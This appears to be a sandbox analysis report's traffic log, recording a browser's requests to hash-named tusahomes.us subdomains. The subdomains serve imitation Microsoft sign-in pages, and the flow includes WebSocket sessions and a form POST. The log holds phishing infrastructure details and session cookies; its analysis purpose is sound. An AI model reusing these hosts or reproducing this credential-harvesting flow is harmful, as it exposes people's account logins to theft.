            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_JXiTFACSOROsZgtGRJo1aA2.js HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_cwzkvppibgumnhupu2wjoa2.js HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: 8f0da58963954c5ebda6645ba9a83b28.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /67f5bce71f9fd88e9ef40d75/ HTTP/1.1Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.usConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.usSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1Sec-WebSocket-Key: wGaDgSvkJ5PfnezLf/4iSg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_41f36656d3c0bb04c90c.js HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_268b957e4bf672b8fe6b.js HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /67f5bce71f9fd88e9ef40d75/ HTTP/1.1Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.usConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.usSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=22e4266d-2e12-4ea3-b94a-a6e90883bec6; brcap=0Sec-WebSocket-Key: BeSkIIvmWJ0rwiS+oiWPig==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: 8f0da58963954c5ebda6645ba9a83b28.tusahomes.usConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4f75990aeef30238698e.js HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /67f5bce71f9fd88e9ef40d75/ HTTP/1.1Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.usConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.usSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=22e4266d-2e12-4ea3-b94a-a6e90883bec6; brcap=0; ai_session=bqpsDU5foUOvqZ4wvqvplK|1744157961714|1744157961714Sec-WebSocket-Key: USFm9cE1f7LkmHyCBwdidA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/1.1Host: ab52444af96f49b7b110b6e3700ca950.tusahomes.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
            Source: global trafficHTTP traffic detected: GET /67f5bce71f9fd88e9ef40d75/ HTTP/1.1Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.usConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.usSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=22e4266d-2e12-4ea3-b94a-a6e90883bec6; brcap=0; ai_session=bqpsDU5foUOvqZ4wvqvplK|1744157961714|1744157961714; MSFPC=GUID=0d2626bc41114d18a4f53ccbe808cb1c&HASH=0d26&LV=202504&V=4&LU=1744157969753Sec-WebSocket-Key: f/GzV9/frahr5k3ZuSSd3Q==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficHTTP traffic detected: GET /vericastharlandclarke/ HTTP/1.1Host: p1.pagewiz.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: p1.pagewiz.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://p1.pagewiz.net/vericastharlandclarke/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: BrowserData=pid%3D648467%26href%3Dhttp%253A//p1.pagewiz.net/vericastharlandclarke/%26hostname%3Dp1.pagewiz.net%26referrer%3D%26appCodeName%3DMozilla%26appName%3DNetscape%26appVersion%3D5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26cookieEnabled%3Dtrue%26language%3DMozilla%26platform%3DWin32%26userAgent%3DMozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26screenWidth%3D1280%26screenHeight%3D1024
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: p1.pagewiz.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: BrowserData=pid%3D648467%26href%3Dhttp%253A//p1.pagewiz.net/vericastharlandclarke/%26hostname%3Dp1.pagewiz.net%26referrer%3D%26appCodeName%3DMozilla%26appName%3DNetscape%26appVersion%3D5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26cookieEnabled%3Dtrue%26language%3DMozilla%26platform%3DWin32%26userAgent%3DMozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26screenWidth%3D1280%26screenHeight%3D1024
            Source: global trafficHTTP traffic detected: GET /Handler/Clicklog.aspx?PageId=648467 HTTP/1.1Host: p1.pagewiz.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: BrowserData=pid%3D648467%26href%3Dhttp%253A//p1.pagewiz.net/vericastharlandclarke/%26hostname%3Dp1.pagewiz.net%26referrer%3D%26appCodeName%3DMozilla%26appName%3DNetscape%26appVersion%3D5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26cookieEnabled%3Dtrue%26language%3DMozilla%26platform%3DWin32%26userAgent%3DMozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26screenWidth%3D1280%26screenHeight%3D1024
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: p1.pagewiz.net
            Source: global trafficDNS traffic detected: DNS query: static.pagewizcdn.com
            Source: global trafficDNS traffic detected: DNS query: m1.pagewizcdn.com
            Source: global trafficDNS traffic detected: DNS query: stats.pagewiz.com
            Source: global trafficDNS traffic detected: DNS query: statdumper.pagewiz.com
            Source: global trafficDNS traffic detected: DNS query: vericast.tusahomes.us
            Source: global trafficDNS traffic detected: DNS query: 330c68f2903044fdaf0390e944b7092d.tusahomes.us
            Source: global trafficDNS traffic detected: DNS query: c547f1062152409fa58dda457a02be72.tusahomes.us
            Source: global trafficDNS traffic detected: DNS query: 126d7c624ad3410bb741b30b9bf3d28f.tusahomes.us
            Source: global trafficDNS traffic detected: DNS query: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
            Source: global trafficDNS traffic detected: DNS query: 8f0da58963954c5ebda6645ba9a83b28.tusahomes.us
            Source: global trafficDNS traffic detected: DNS query: ab52444af96f49b7b110b6e3700ca950.tusahomes.us
            Source: global trafficDNS traffic detected: DNS query: a4eaec44075f43d19af55316af4b7550.tusahomes.us
            Source: unknownHTTP traffic detected: POST /?vffzw9n=Y2Y4NGIwYjU5NTVmNDk0YzkxMmQ1OThhMjBmZGRjMzg%3D HTTP/1.1Host: vericast.tusahomes.usConnection: keep-aliveContent-Length: 3873Cache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Origin: https://vericast.tusahomes.usContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://vericast.tusahomes.us/?vffzw9n=Y2Y4NGIwYjU5NTVmNDk0YzkxMmQ1OThhMjBmZGRjMzg%3DAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Apr 2025 00:19:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 0Connection: closecache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 08202605-cce2-4e4b-95aa-b7fbef8c3200x-ms-ests-server: 2.1.20465.4 - SCUS ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Apr 2025 00:19:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 0Connection: closecache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: b6f82d18-3d5a-4e53-879f-547eba6b1000x-ms-ests-server: 2.1.20465.4 - NCUS ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
